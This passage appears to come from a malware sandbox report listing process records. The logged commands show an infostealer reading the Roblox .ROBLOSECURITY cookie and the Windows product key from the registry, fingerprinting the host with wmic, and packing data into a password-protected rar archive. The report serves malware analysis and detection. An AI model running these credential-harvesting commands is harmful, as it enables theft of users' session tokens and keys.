                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
                                                                                                                                                                                                                            Imagebase:0x7ff6048f0000
                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                            Start time:02:37:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                                                            Start time:02:37:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                                                            Start time:02:37:32
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                                                            Start time:02:37:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                            Start time:02:37:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff736450000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                            Start time:02:37:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff641f10000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                            Start time:02:37:33
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff736450000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff736450000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                            Start time:02:37:35
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                            Start time:02:37:37
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                            Start time:02:37:37
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                            Start time:02:37:37
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                                                            Start time:02:37:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                                                            Start time:02:37:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                                                            Start time:02:37:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
                                                                                                                                                                                                                            Imagebase:0x7ff7cf880000
                                                                                                                                                                                                                            File size:630'736 bytes
                                                                                                                                                                                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                                                            Start time:02:37:46
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:106
                                                                                                                                                                                                                            Start time:02:37:46
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:107
                                                                                                                                                                                                                            Start time:02:37:46
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic os get Caption
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:108
                                                                                                                                                                                                                            Start time:02:37:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:109
                                                                                                                                                                                                                            Start time:02:37:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:110
                                                                                                                                                                                                                            Start time:02:37:47
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:111
                                                                                                                                                                                                                            Start time:02:37:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                                                            Start time:02:37:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                                                            Start time:02:37:48
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                                                            Start time:02:37:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                                                            Start time:02:37:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                                                            Start time:02:37:49
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                            Imagebase:0x7ff760310000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                                                            Start time:02:37:50
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                                                            Start time:02:37:50
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                                                            Start time:02:37:50
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff7d8db0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                                                            Start time:02:37:51
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                            Imagebase:0x7ff7bb6e0000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

